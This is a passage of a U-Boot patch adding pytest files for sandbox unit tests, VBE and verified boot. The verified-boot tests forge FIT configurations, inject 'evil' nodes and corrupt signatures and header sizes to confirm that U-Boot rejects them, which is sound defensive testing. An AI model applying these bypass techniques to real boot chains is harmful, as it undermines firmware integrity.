"""Initialise data for bootflow tests""" + + setup_bootflow_image(ubman) + setup_bootmenu_image(ubman) + setup_cedit_file(ubman) + setup_cros_image(ubman) + setup_android_image(ubman) + setup_efi_image(ubman) + + # Restart so that the new mmc1.img is picked up + ubman.restart_uboot() + + +def 
test_ut(ubman, ut_subtest): + """Execute a "ut" subtest. + + The subtests are collected in function generate_ut_subtest() from linker + generated lists by applying a regular expression to the lines of file + u-boot.sym. The list entries are created using the C macro UNIT_TEST(). + + Strict naming conventions have to be followed to match the regular + expression. Use UNIT_TEST(foo_test_bar, _flags, foo_test) for a test bar in + test suite foo that can be executed via command 'ut foo bar' and is + implemented in C function foo_test_bar(). + + Args: + ubman (ConsoleBase): U-Boot console + ut_subtest (str): test to be executed via command ut, e.g 'foo bar' to + execute command 'ut foo bar' + """ + + if ut_subtest == 'hush hush_test_simple_dollar': + # ut hush hush_test_simple_dollar prints "Unknown command" on purpose. + with ubman.disable_check('unknown_command'): + output = ubman.run_command('ut ' + ut_subtest) + assert 'Unknown command \'quux\' - try \'help\'' in output + else: + output = ubman.run_command('ut ' + ut_subtest) + assert output.endswith('failures: 0') diff --git a/test/py/tests/test_vbe.py b/test/py/tests/test_vbe.py new file mode 100644 index 00000000000..a1f32f375b6 --- /dev/null +++ b/test/py/tests/test_vbe.py @@ -0,0 +1,119 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright 2022 Google LLC +# +# Test addition of VBE + +import pytest + +import fit_util + +# Define a base ITS which we can adjust using % and a dictionary +base_its = ''' +/dts-v1/; + +/ { + description = "Example kernel"; + + images { + kernel-1 { + data = /incbin/("%(kernel)s"); + type = "kernel"; + arch = "sandbox"; + os = "linux"; + load = <0x40000>; + entry = <0x8>; + compression = "%(compression)s"; + + random { + compatible = "vbe,random-rand"; + vbe,size = <0x40>; + vbe,required; + }; + aslr1 { + compatible = "vbe,aslr-move"; + vbe,align = <0x100000>; + }; + aslr2 { + compatible = "vbe,aslr-rand"; + }; + efi-runtime { + compatible = "vbe,efi-runtime-rand"; + }; + wibble { + compatible = "vbe,wibble"; + }; + }; + + fdt-1 { + description = "snow"; + data = /incbin/("%(fdt)s"); + type = "flat_dt"; + arch = "sandbox"; + load = <%(fdt_addr)#x>; + compression = "%(compression)s"; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel-1"; + fdt = "fdt-1"; + }; + }; +}; +''' + +# Define a base FDT - currently we don't use anything in this +base_fdt = ''' +/dts-v1/; + +/ { + chosen { + }; +}; +''' + +# This is the U-Boot script that is run for each test. First load the FIT, +# then run the 'bootm' command, then run the unit test which checks that the +# working tree has the required things filled in according to the OS requests +# above (random, aslr2, etc.) 
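Note that base_its above and the script below rely on old-style %() substitution with explicit hex conversions, so the integer addresses in the params dict can be passed straight through. A tiny illustration with made-up values:

params = {'fit_addr': 0x1000, 'fdt_addr': 0x80000}
'host load hostfs 0 %(fit_addr)x test.fit' % params   # -> 'host load hostfs 0 1000 test.fit'
'load = <%(fdt_addr)#x>;' % params                    # -> 'load = <0x80000>;'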
+base_script = ''' +host load hostfs 0 %(fit_addr)x %(fit)s +fdt addr %(fit_addr)x +bootm start %(fit_addr)x +bootm loados +bootm prep +fdt addr +fdt print +ut bootstd -f vbe_test_fixup_norun +''' + +@pytest.mark.boardspec('sandbox_flattree') +@pytest.mark.requiredtool('dtc') +def test_vbe(ubman): + kernel = fit_util.make_kernel(ubman, 'vbe-kernel.bin', 'kernel') + fdt = fit_util.make_dtb(ubman, base_fdt, 'vbe-fdt') + fdt_out = fit_util.make_fname(ubman, 'fdt-out.dtb') + + params = { + 'fit_addr' : 0x1000, + + 'kernel' : kernel, + + 'fdt' : fdt, + 'fdt_out' : fdt_out, + 'fdt_addr' : 0x80000, + 'fdt_size' : 0x1000, + + 'compression' : 'none', + } + mkimage = ubman.config.build_dir + '/tools/mkimage' + fit = fit_util.make_fit(ubman, mkimage, base_its, params, 'test-vbe.fit', + base_fdt) + params['fit'] = fit + cmd = base_script % params + + with ubman.log.section('Kernel load'): + output = ubman.run_command_list(cmd.splitlines()) + + assert 'failures: 0' in output[-1] diff --git a/test/py/tests/test_vbe_vpl.py b/test/py/tests/test_vbe_vpl.py new file mode 100644 index 00000000000..f011b034f63 --- /dev/null +++ b/test/py/tests/test_vbe_vpl.py @@ -0,0 +1,39 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright 2022 Google LLC +# +# Test addition of VBE + +import os + +import pytest +import utils + +@pytest.mark.boardspec('sandbox_vpl') +@pytest.mark.requiredtool('dtc') +def test_vbe_vpl(ubman): + #cmd = [ubman.config.build_dir + fname, '-v'] + ram = os.path.join(ubman.config.build_dir, 'ram.bin') + fdt = os.path.join(ubman.config.build_dir, 'arch/sandbox/dts/test.dtb') + image_fname = os.path.join(ubman.config.build_dir, 'image.bin') + + # Enable firmware1 and the mmc that it uses. These are needed for the full + # VBE flow. + utils.run_and_log( + ubman, f'fdtput -t s {fdt} /bootstd/firmware0 status disabled') + utils.run_and_log( + ubman, f'fdtput -t s {fdt} /bootstd/firmware1 status okay') + utils.run_and_log( + ubman, f'fdtput -t s {fdt} /mmc3 status okay') + utils.run_and_log( + ubman, f'fdtput -t s {fdt} /mmc3 filename {image_fname}') + + # Remove any existing RAM file, so we don't have old data present + if os.path.exists(ram): + os.remove(ram) + flags = ['-p', image_fname, '-w', '-s', 'state.dtb'] + ubman.restart_uboot_with_flags(flags) + + # Make sure that VBE was used in both VPL (to load SPL) and SPL (to load + # U-Boot + output = ubman.run_command('vbe state') + assert output == 'Phases: VPL SPL' diff --git a/test/py/tests/test_vboot.py b/test/py/tests/test_vboot.py new file mode 100644 index 00000000000..7a7f9c379de --- /dev/null +++ b/test/py/tests/test_vboot.py @@ -0,0 +1,643 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2016, Google Inc. 
+# +# U-Boot Verified Boot Test + +""" +This tests verified boot in the following ways: + +For image verification: +- Create FIT (unsigned) with mkimage +- Check that verification shows that no keys are verified +- Sign image +- Check that verification shows that a key is now verified + +For configuration verification: +- Corrupt signature and check for failure +- Create FIT (with unsigned configuration) with mkimage +- Check that image verification works +- Sign the FIT and mark the key as 'required' for verification +- Check that image verification works +- Corrupt the signature +- Check that image verification no-longer works + +For pre-load header verification: +- Create FIT image with a pre-load header +- Check that signature verification succeeds +- Corrupt the FIT image +- Check that signature verification fails +- Launch an FIT image without a pre-load header +- Check that image verification fails + +Tests run with both SHA1 and SHA256 hashing. + +This also tests fdt_add_pubkey utility in the simple way: +- Create DTB and FIT files +- Add keys with fdt_add_pubkey to DTB +- Sign FIT image +- Check with fit_check_sign that keys properly added to DTB file +""" + +import os +import shutil +import struct +import pytest +import utils +import vboot_forge +import vboot_evil + +# Common helper functions +def dtc(dts, ubman, dtc_args, datadir, tmpdir, dtb): + """Run the device tree compiler to compile a .dts file + + The output file will be the same as the input file but with a .dtb + extension. + + Args: + dts: Device tree file to compile. + ubman: U-Boot console. + dtc_args: DTC arguments. + datadir: Path to data directory. + tmpdir: Path to temp directory. + dtb: Resulting DTB file. + """ + dtb = dts.replace('.dts', '.dtb') + utils.run_and_log(ubman, 'dtc %s %s%s -O dtb ' + '-o %s%s' % (dtc_args, datadir, dts, tmpdir, dtb)) + +def make_fit(its, ubman, mkimage, dtc_args, datadir, fit): + """Make a new FIT from the .its source file. + + This runs 'mkimage -f' to create a new FIT. + + Args: + its: Filename containing .its source. + ubman: U-Boot console. + mkimage: Path to mkimage utility. + dtc_args: DTC arguments. + datadir: Path to data directory. + fit: Resulting FIT file. + """ + utils.run_and_log(ubman, [mkimage, '-D', dtc_args, '-f', + '%s%s' % (datadir, its), fit]) + +# Only run the full suite on a few combinations, since it doesn't add any more +# test coverage. 
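Each row below supplies, in order, the name, sha_algo, padding, sign_options, required, full_test, algo_arg and global_sign arguments of test_vboot() (see the parametrize decorator further down). For instance, the 'sha256-pss-required' row is equivalent to calling:

test_vboot(ubman, name='sha256-pss-required', sha_algo='sha256', padding='-pss',
           sign_options=None, required=True, full_test=False, algo_arg=False,
           global_sign=False)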
+TESTDATA_IN = [ + ['sha1-basic', 'sha1', '', None, False, True, False, False], + ['sha1-pad', 'sha1', '', '-E -p 0x10000', False, False, False, False], + ['sha1-pss', 'sha1', '-pss', None, False, False, False, False], + ['sha1-pss-pad', 'sha1', '-pss', '-E -p 0x10000', False, False, False, False], + ['sha256-basic', 'sha256', '', None, False, False, False, False], + ['sha256-pad', 'sha256', '', '-E -p 0x10000', False, False, False, False], + ['sha256-pss', 'sha256', '-pss', None, False, False, False, False], + ['sha256-pss-pad', 'sha256', '-pss', '-E -p 0x10000', False, False, False, False], + ['sha256-pss-required', 'sha256', '-pss', None, True, False, False, False], + ['sha256-pss-pad-required', 'sha256', '-pss', '-E -p 0x10000', True, True, False, False], + ['sha384-basic', 'sha384', '', None, False, False, False, False], + ['sha384-pad', 'sha384', '', '-E -p 0x10000', False, False, False, False], + ['algo-arg', 'algo-arg', '', '-o sha256,rsa2048', False, False, True, False], + ['sha256-global-sign', 'sha256', '', '', False, False, False, True], + ['sha256-global-sign-pss', 'sha256', '-pss', '', False, False, False, True], +] + +# Mark all but the first test as slow, so they are not run with '-k not slow' +TESTDATA = [TESTDATA_IN[0]] +TESTDATA += [pytest.param(*v, marks=pytest.mark.slow) for v in TESTDATA_IN[1:]] + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('fit_signature') +@pytest.mark.requiredtool('dtc') +@pytest.mark.requiredtool('fdtget') +@pytest.mark.requiredtool('fdtput') +@pytest.mark.requiredtool('openssl') +@pytest.mark.parametrize("name,sha_algo,padding,sign_options,required,full_test,algo_arg,global_sign", + TESTDATA) +def test_vboot(ubman, name, sha_algo, padding, sign_options, required, + full_test, algo_arg, global_sign): + """Test verified boot signing with mkimage and verification with 'bootm'. + + This works using sandbox only as it needs to update the device tree used + by U-Boot to hold public keys from the signing process. + + The SHA1 and SHA256 tests are combined into a single test since the + key-generation process is quite slow and we want to avoid doing it twice. + """ + def dtc_options(dts, options): + """Run the device tree compiler to compile a .dts file + + The output file will be the same as the input file but with a .dtb + extension. + + Args: + dts: Device tree file to compile. + options: Options provided to the compiler. + """ + dtb = dts.replace('.dts', '.dtb') + utils.run_and_log(ubman, 'dtc %s %s%s -O dtb -o %s%s %s' % + (dtc_args, datadir, dts, tmpdir, dtb, options)) + + def run_binman(dtb): + """Run binman to build an image + + Args: + dtb: Device tree file used as input file. + """ + pythonpath = os.environ.get('PYTHONPATH', '') + os.environ['PYTHONPATH'] = pythonpath + ':' + '%s/../scripts/dtc/pylibfdt' % tmpdir + utils.run_and_log(ubman, [binman, 'build', '-d', "%s/%s" % (tmpdir,dtb), + '-a', "pre-load-key-path=%s" % tmpdir, '-O', + tmpdir, '-I', tmpdir]) + os.environ['PYTHONPATH'] = pythonpath + + def run_bootm(sha_algo, test_type, expect_string, boots, fit=None): + """Run a 'bootm' command U-Boot. + + This always starts a fresh U-Boot instance since the device tree may + contain a new public key. + + Args: + test_type: A string identifying the test type. + expect_string: A string which is expected in the output. + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to + use. 
+ boots: A boolean that is True if Linux should boot and False if + we are expected to not boot + fit: FIT filename to load and verify + """ + if not fit: + fit = '%stest.fit' % tmpdir + ubman.restart_uboot() + with ubman.log.section('Verified boot %s %s' % (sha_algo, test_type)): + output = ubman.run_command_list( + ['host load hostfs - 100 %s' % fit, + 'fdt addr 100', + 'bootm 100']) + assert expect_string in ''.join(output) + if boots: + assert 'sandbox: continuing, as we cannot run' in ''.join(output) + else: + assert('sandbox: continuing, as we cannot run' + not in ''.join(output)) + + def sign_fit(sha_algo, options): + """Sign the FIT + + Signs the FIT and writes the signature into it. It also writes the + public key into the dtb. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to + use. + options: Options to provide to mkimage. + """ + args = [mkimage, '-F', '-k', tmpdir, '-K', dtb, '-r', fit] + if options: + args += options.split(' ') + ubman.log.action('%s: Sign images' % sha_algo) + utils.run_and_log(ubman, args) + + def sign_fit_dtb(sha_algo, options, dtb): + """Sign the FIT + + Signs the FIT and writes the signature into it. It also writes the + public key into the dtb. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to + use. + options: Options to provide to mkimage. + """ + args = [mkimage, '-F', '-k', tmpdir, '-K', dtb, '-r', fit] + if options: + args += options.split(' ') + ubman.log.action('%s: Sign images' % sha_algo) + utils.run_and_log(ubman, args) + + def sign_fit_norequire(sha_algo, options): + """Sign the FIT + + Signs the FIT and writes the signature into it. It also writes the + public key into the dtb. It does not mark key as 'required' in dtb. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to + use. + options: Options to provide to mkimage. + """ + args = [mkimage, '-F', '-k', tmpdir, '-K', dtb, fit] + if options: + args += options.split(' ') + ubman.log.action('%s: Sign images' % sha_algo) + utils.run_and_log(ubman, args) + + def replace_fit_totalsize(size): + """Replace FIT header's totalsize with something greater. + + The totalsize must be less than or equal to FIT_SIGNATURE_MAX_SIZE. + If the size is greater, the signature verification should return false. + + Args: + size: The new totalsize of the header + + Returns: + prev_size: The previous totalsize read from the header + """ + total_size = 0 + with open(fit, 'r+b') as handle: + handle.seek(4) + total_size = handle.read(4) + handle.seek(4) + handle.write(struct.pack(">I", size)) + return struct.unpack(">I", total_size)[0] + + def corrupt_file(fit, offset, value): + """Corrupt a file + + To corrupt a file, a value is written at the specified offset + + Args: + fit: The file to corrupt + offset: Offset to write + value: Value written + """ + with open(fit, 'r+b') as handle: + handle.seek(offset) + handle.write(struct.pack(">I", value)) + + def create_rsa_pair(name): + """Generate a new RSA key paid and certificate + + Args: + name: Name of of the key (e.g. 
'dev') + """ + public_exponent = 65537 + + if sha_algo == "sha384": + rsa_keygen_bits = 3072 + else: + rsa_keygen_bits = 2048 + + utils.run_and_log(ubman, 'openssl genpkey -algorithm RSA -out %s%s.key ' + '-pkeyopt rsa_keygen_bits:%d ' + '-pkeyopt rsa_keygen_pubexp:%d' % + (tmpdir, name, rsa_keygen_bits, public_exponent)) + + # Create a certificate containing the public key + utils.run_and_log(ubman, 'openssl req -batch -new -x509 -key %s%s.key ' + '-out %s%s.crt' % (tmpdir, name, tmpdir, name)) + + def test_with_algo(sha_algo, padding, sign_options): + """Test verified boot with the given hash algorithm. + + This is the main part of the test code. The same procedure is followed + for both hashing algorithms. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to + use. + padding: Either '' or '-pss', to select the padding to use for the + rsa signature algorithm. + sign_options: Options to mkimage when signing a fit image. + """ + # Compile our device tree files for kernel and U-Boot. These are + # regenerated here since mkimage will modify them (by adding a + # public key) below. + dtc('sandbox-kernel.dts', ubman, dtc_args, datadir, tmpdir, dtb) + dtc('sandbox-u-boot.dts', ubman, dtc_args, datadir, tmpdir, dtb) + + # Build the FIT, but don't sign anything yet + ubman.log.action('%s: Test FIT with signed images' % sha_algo) + make_fit('sign-images-%s%s.its' % (sha_algo, padding), ubman, mkimage, dtc_args, datadir, fit) + run_bootm(sha_algo, 'unsigned images', ' - OK' if algo_arg else 'dev-', True) + + # Sign images with our dev keys + sign_fit(sha_algo, sign_options) + run_bootm(sha_algo, 'signed images', 'dev+', True) + + # Create a fresh .dtb without the public keys + dtc('sandbox-u-boot.dts', ubman, dtc_args, datadir, tmpdir, dtb) + + ubman.log.action('%s: Test FIT with signed configuration' % sha_algo) + make_fit('sign-configs-%s%s.its' % (sha_algo, padding), ubman, mkimage, dtc_args, datadir, fit) + run_bootm(sha_algo, 'unsigned config', '%s+ OK' % ('sha256' if algo_arg else sha_algo), True) + + # Sign images with our dev keys + sign_fit(sha_algo, sign_options) + run_bootm(sha_algo, 'signed config', 'dev+', True) + + ubman.log.action('%s: Check signed config on the host' % sha_algo) + + utils.run_and_log(ubman, [fit_check_sign, '-f', fit, '-k', dtb]) + + if full_test: + # Make sure that U-Boot checks that the config is in the list of + # hashed nodes. If it isn't, a security bypass is possible. + ffit = '%stest.forged.fit' % tmpdir + shutil.copyfile(fit, ffit) + with open(ffit, 'rb') as fd: + root, strblock = vboot_forge.read_fdt(fd) + root, strblock = vboot_forge.manipulate(root, strblock) + with open(ffit, 'w+b') as fd: + vboot_forge.write_fdt(root, strblock, fd) + utils.run_and_log_expect_exception( + ubman, [fit_check_sign, '-f', ffit, '-k', dtb], + 1, 'Failed to verify required signature') + + run_bootm(sha_algo, 'forged config', 'Bad Data Hash', False, ffit) + + # Try adding an evil root node. This should be detected. + efit = '%stest.evilf.fit' % tmpdir + shutil.copyfile(fit, efit) + vboot_evil.add_evil_node(fit, efit, evil_kernel, 'fakeroot') + + utils.run_and_log_expect_exception( + ubman, [fit_check_sign, '-f', efit, '-k', dtb], + 1, 'Failed to verify required signature') + run_bootm(sha_algo, 'evil fakeroot', 'Bad FIT kernel image format', + False, efit) + + # Try adding an @ to the kernel node name. This should be detected. 
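A brief aside on the replace_fit_totalsize() and corrupt_file() helpers defined above: they work because a FIT is a flattened device tree blob, whose header starts with the 0xd00dfeed magic followed by a big-endian 32-bit totalsize field at byte offset 4. A rough sketch of reading that field back, for illustration only (read_fit_totalsize() is not used by the test):

import struct

def read_fit_totalsize(path):
    """Return the totalsize field of a FIT/FDT blob (big-endian u32 at offset 4)"""
    with open(path, 'rb') as fd:
        magic, totalsize = struct.unpack('>II', fd.read(8))
    assert magic == 0xd00dfeed    # standard FDT magic
    return totalsize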
+ efit = '%stest.evilk.fit' % tmpdir + shutil.copyfile(fit, efit) + vboot_evil.add_evil_node(fit, efit, evil_kernel, 'kernel@') + + msg = 'Signature checking prevents use of unit addresses (@) in nodes' + utils.run_and_log_expect_exception( + ubman, [fit_check_sign, '-f', efit, '-k', dtb], + 1, msg) + run_bootm(sha_algo, 'evil kernel@', msg, False, efit) + + # Create a new properly signed fit and replace header bytes + make_fit('sign-configs-%s%s.its' % (sha_algo, padding), ubman, mkimage, dtc_args, datadir, fit) + sign_fit(sha_algo, sign_options) + bcfg = ubman.config.buildconfig + max_size = int(bcfg.get('config_fit_signature_max_size', 0x10000000), 0) + existing_size = replace_fit_totalsize(max_size + 1) + run_bootm(sha_algo, 'Signed config with bad hash', 'Bad Data Hash', + False) + ubman.log.action('%s: Check overflowed FIT header totalsize' % sha_algo) + + # Replace with existing header bytes + replace_fit_totalsize(existing_size) + run_bootm(sha_algo, 'signed config', 'dev+', True) + ubman.log.action('%s: Check default FIT header totalsize' % sha_algo) + + # Increment the first byte of the signature, which should cause failure + sig = utils.run_and_log(ubman, 'fdtget -t bx %s %s value' % + (fit, sig_node)) + byte_list = sig.split() + byte = int(byte_list[0], 16) + byte_list[0] = '%x' % (byte + 1) + sig = ' '.join(byte_list) + utils.run_and_log(ubman, 'fdtput -t bx %s %s value %s' % + (fit, sig_node, sig)) + + run_bootm(sha_algo, 'Signed config with bad hash', 'Bad Data Hash', + False) + + ubman.log.action('%s: Check bad config on the host' % sha_algo) + utils.run_and_log_expect_exception( + ubman, [fit_check_sign, '-f', fit, '-k', dtb], + 1, 'Failed to verify required signature') + + def test_required_key(sha_algo, padding, sign_options): + """Test verified boot with the given hash algorithm. + + This function tests if U-Boot rejects an image when a required key isn't + used to sign a FIT. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to use + padding: Either '' or '-pss', to select the padding to use for the + rsa signature algorithm. + sign_options: Options to mkimage when signing a fit image. + """ + # Compile our device tree files for kernel and U-Boot. These are + # regenerated here since mkimage will modify them (by adding a + # public key) below. + dtc('sandbox-kernel.dts', ubman, dtc_args, datadir, tmpdir, dtb) + dtc('sandbox-u-boot.dts', ubman, dtc_args, datadir, tmpdir, dtb) + + ubman.log.action('%s: Test FIT with configs images' % sha_algo) + + # Build the FIT with prod key (keys required) and sign it. This puts the + # signature into sandbox-u-boot.dtb, marked 'required' + make_fit('sign-configs-%s%s-prod.its' % (sha_algo, padding), ubman, mkimage, dtc_args, datadir, fit) + sign_fit(sha_algo, sign_options) + + # Build the FIT with dev key (keys NOT required). This adds the + # signature into sandbox-u-boot.dtb, NOT marked 'required'. + make_fit('sign-configs-%s%s.its' % (sha_algo, padding), ubman, mkimage, dtc_args, datadir, fit) + sign_fit_norequire(sha_algo, sign_options) + + # So now sandbox-u-boot.dtb two signatures, for the prod and dev keys. + # Only the prod key is set as 'required'. But FIT we just built has + # a dev signature only (sign_fit_norequire() overwrites the FIT). + # Try to boot the FIT with dev key. This FIT should not be accepted by + # U-Boot because the prod key is required. + run_bootm(sha_algo, 'required key', '', False) + + # Build the FIT with dev key (keys required) and sign it. 
This puts the + # signature into sandbox-u-boot.dtb, marked 'required'. + make_fit('sign-configs-%s%s.its' % (sha_algo, padding), ubman, mkimage, dtc_args, datadir, fit) + sign_fit(sha_algo, sign_options) + + # Set the required-mode policy to "any". + # So now sandbox-u-boot.dtb two signatures, for the prod and dev keys. + # Both the dev and prod key are set as 'required'. But FIT we just built has + # a dev signature only (sign_fit() overwrites the FIT). + # Try to boot the FIT with dev key. This FIT should be accepted by + # U-Boot because the dev key is required and policy is "any" required key. + utils.run_and_log(ubman, 'fdtput -t s %s /signature required-mode any' % + dtb) + run_bootm(sha_algo, 'multi required key', 'dev+', True) + + # Set the required-mode policy to "all". + # So now sandbox-u-boot.dtb two signatures, for the prod and dev keys. + # Both the dev and prod key are set as 'required'. But FIT we just built has + # a dev signature only (sign_fit() overwrites the FIT). + # Try to boot the FIT with dev key. This FIT should not be accepted by + # U-Boot because the prod key is required and policy is "all" required key + utils.run_and_log(ubman, 'fdtput -t s %s /signature required-mode all' % + dtb) + run_bootm(sha_algo, 'multi required key', '', False) + + def test_global_sign(sha_algo, padding, sign_options): + """Test global image signature with the given hash algorithm and padding. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to use + padding: Either '' or '-pss', to select the padding to use for the + rsa signature algorithm. + """ + + dtb = '%ssandbox-u-boot-global%s.dtb' % (tmpdir, padding) + ubman.config.dtb = dtb + + # Compile our device tree files for kernel and U-Boot. These are + # regenerated here since mkimage will modify them (by adding a + # public key) below. + dtc('sandbox-kernel.dts', ubman, dtc_args, datadir, tmpdir, dtb) + dtc_options('sandbox-u-boot-global%s.dts' % padding, '-p 1024') + + # Build the FIT with dev key (keys NOT required). This adds the + # signature into sandbox-u-boot.dtb, NOT marked 'required'. + make_fit('simple-images.its', ubman, mkimage, dtc_args, datadir, fit) + sign_fit_dtb(sha_algo, '', dtb) + + # Build the dtb for binman that define the pre-load header + # with the global sigature. + dtc('sandbox-binman%s.dts' % padding, ubman, dtc_args, datadir, tmpdir, dtb) + + # Run binman to create the final image with the not signed fit + # and the pre-load header that contains the global signature. 
+ run_binman('sandbox-binman%s.dtb' % padding) + + # Check that the signature is correctly verified by u-boot + run_bootm(sha_algo, 'global image signature', + 'signature check has succeed', True, "%ssandbox.img" % tmpdir) + + # Corrupt the image (just one byte after the pre-load header) + corrupt_file("%ssandbox.img" % tmpdir, 4096, 255); + + # Check that the signature verification fails + run_bootm(sha_algo, 'global image signature', + 'signature check has failed', False, "%ssandbox.img" % tmpdir) + + # Check that the boot fails if the global signature is not provided + run_bootm(sha_algo, 'global image signature', 'signature is mandatory', False) + + tmpdir = os.path.join(ubman.config.result_dir, name) + '/' + if not os.path.exists(tmpdir): + os.mkdir(tmpdir) + datadir = ubman.config.source_dir + '/test/py/tests/vboot/' + fit = '%stest.fit' % tmpdir + mkimage = ubman.config.build_dir + '/tools/mkimage' + binman = ubman.config.source_dir + '/tools/binman/binman' + fit_check_sign = ubman.config.build_dir + '/tools/fit_check_sign' + dtc_args = '-I dts -O dtb -i %s' % tmpdir + dtb = '%ssandbox-u-boot.dtb' % tmpdir + sig_node = '/configurations/conf-1/signature' + + create_rsa_pair('dev') + create_rsa_pair('prod') + + # Create a number kernel image with zeroes + with open('%stest-kernel.bin' % tmpdir, 'wb') as fd: + fd.write(500 * b'\0') + + # Create a second kernel image with ones + evil_kernel = '%stest-kernel1.bin' % tmpdir + with open(evil_kernel, 'wb') as fd: + fd.write(500 * b'\x01') + + # We need to use our own device tree file. Remember to restore it + # afterwards. + old_dtb = ubman.config.dtb + try: + ubman.config.dtb = dtb + if global_sign: + test_global_sign(sha_algo, padding, sign_options) + elif required: + test_required_key(sha_algo, padding, sign_options) + else: + test_with_algo(sha_algo, padding, sign_options) + finally: + # Go back to the original U-Boot with the correct dtb. + ubman.config.dtb = old_dtb + ubman.restart_uboot() + + +TESTDATA_IN = [ + ['sha1-basic', 'sha1', '', None, False], + ['sha1-pad', 'sha1', '', '-E -p 0x10000', False], + ['sha1-pss', 'sha1', '-pss', None, False], + ['sha1-pss-pad', 'sha1', '-pss', '-E -p 0x10000', False], + ['sha256-basic', 'sha256', '', None, False], + ['sha256-pad', 'sha256', '', '-E -p 0x10000', False], + ['sha256-pss', 'sha256', '-pss', None, False], + ['sha256-pss-pad', 'sha256', '-pss', '-E -p 0x10000', False], + ['sha256-pss-required', 'sha256', '-pss', None, False], + ['sha256-pss-pad-required', 'sha256', '-pss', '-E -p 0x10000', False], + ['sha384-basic', 'sha384', '', None, False], + ['sha384-pad', 'sha384', '', '-E -p 0x10000', False], + ['algo-arg', 'algo-arg', '', '-o sha256,rsa2048', True], + ['sha256-global-sign', 'sha256', '', '', False], + ['sha256-global-sign-pss', 'sha256', '-pss', '', False], +] + +# Mark all but the first test as slow, so they are not run with '-k not slow' +TESTDATA = [TESTDATA_IN[0]] +TESTDATA += [pytest.param(*v, marks=pytest.mark.slow) for v in TESTDATA_IN[1:]] + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('fit_signature') +@pytest.mark.requiredtool('dtc') +@pytest.mark.requiredtool('openssl') +@pytest.mark.parametrize("name,sha_algo,padding,sign_options,algo_arg", TESTDATA) +def test_fdt_add_pubkey(ubman, name, sha_algo, padding, sign_options, algo_arg): + """Test fdt_add_pubkey utility with bunch of different algo options.""" + + def sign_fit(sha_algo, options): + """Sign the FIT + + Signs the FIT and writes the signature into it. 
+ + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to + use. + options: Options to provide to mkimage. + """ + args = [mkimage, '-F', '-k', tmpdir, fit] + if options: + args += options.split(' ') + ubman.log.action('%s: Sign images' % sha_algo) + utils.run_and_log(ubman, args) + + def test_add_pubkey(sha_algo, padding, sign_options): + """Test fdt_add_pubkey utility with given hash algorithm and padding. + + This function tests if fdt_add_pubkey utility may add public keys into dtb. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to use + padding: Either '' or '-pss', to select the padding to use for the + rsa signature algorithm. + sign_options: Options to mkimage when signing a fit image. + """ + + # Create a fresh .dtb without the public keys + dtc('sandbox-u-boot.dts', ubman, dtc_args, datadir, tmpdir, dtb) + + ubman.log.action('%s: Test fdt_add_pubkey with signed configuration' % sha_algo) + # Then add the dev key via the fdt_add_pubkey tool + utils.run_and_log(ubman, + [fdt_add_pubkey, '-a', '%s,%s' % + ('sha256' if algo_arg else sha_algo, + 'rsa3072' if sha_algo == 'sha384' else 'rsa2048'), + '-k', tmpdir, '-n', 'dev', '-r', 'conf', dtb]) + + make_fit('sign-configs-%s%s.its' % (sha_algo, padding), ubman, mkimage, dtc_args, datadir, fit) + + # Sign images with our dev keys + sign_fit(sha_algo, sign_options) + + # Check with fit_check_sign that FIT is signed with key + utils.run_and_log(ubman, [fit_check_sign, '-f', fit, '-k', dtb]) + + tmpdir = os.path.join(ubman.config.result_dir, name) + '/' + if not os.path.exists(tmpdir): + os.mkdir(tmpdir) + datadir = ubman.config.source_dir + '/test/py/tests/vboot/' + fit = '%stest.fit' % tmpdir + mkimage = ubman.config.build_dir + '/tools/mkimage' + binman = ubman.config.source_dir + '/tools/binman/binman' + fit_check_sign = ubman.config.build_dir + '/tools/fit_check_sign' + fdt_add_pubkey = ubman.config.build_dir + '/tools/fdt_add_pubkey' + dtc_args = '-I dts -O dtb -i %s' % tmpdir + dtb = '%ssandbox-u-boot.dtb' % tmpdir + + # keys created in test_vboot test + + test_add_pubkey(sha_algo, padding, sign_options) diff --git a/test/py/tests/test_vpl.py b/test/py/tests/test_vpl.py new file mode 100644 index 00000000000..a269c7c262e --- /dev/null +++ b/test/py/tests/test_vpl.py @@ -0,0 +1,33 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright 2022 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +import os.path +import pytest + +def test_vpl(ubman, ut_vpl_subtest): + """Execute a "ut" subtest. + + The subtests are collected in function generate_ut_subtest() from linker + generated lists by applying a regular expression to the lines of file + vpl/u-boot-vpl.sym. The list entries are created using the C macro + UNIT_TEST(). + + Strict naming conventions have to be followed to match the regular + expression. Use UNIT_TEST(foo_test_bar, _flags, foo_test) for a test bar in + test suite foo that can be executed via command 'ut foo bar' and is + implemented in C function foo_test_bar(). + + Args: + ubman (ConsoleBase): U-Boot console + ut_subtest (str): VPL test to be executed (e.g. 'dm platdata_phandle') + """ + try: + ubman.restart_uboot_with_flags(['-u', '-k', ut_vpl_subtest.split()[1]]) + output = ubman.get_spawn_output().replace('\r', '') + assert 'failures: 0' in output + finally: + # Restart afterward in case a non-VPL test is run next. This should not + # happen since VPL tests are run in their own invocation of test.py, but + # the cost of doing this is not too great at present. 
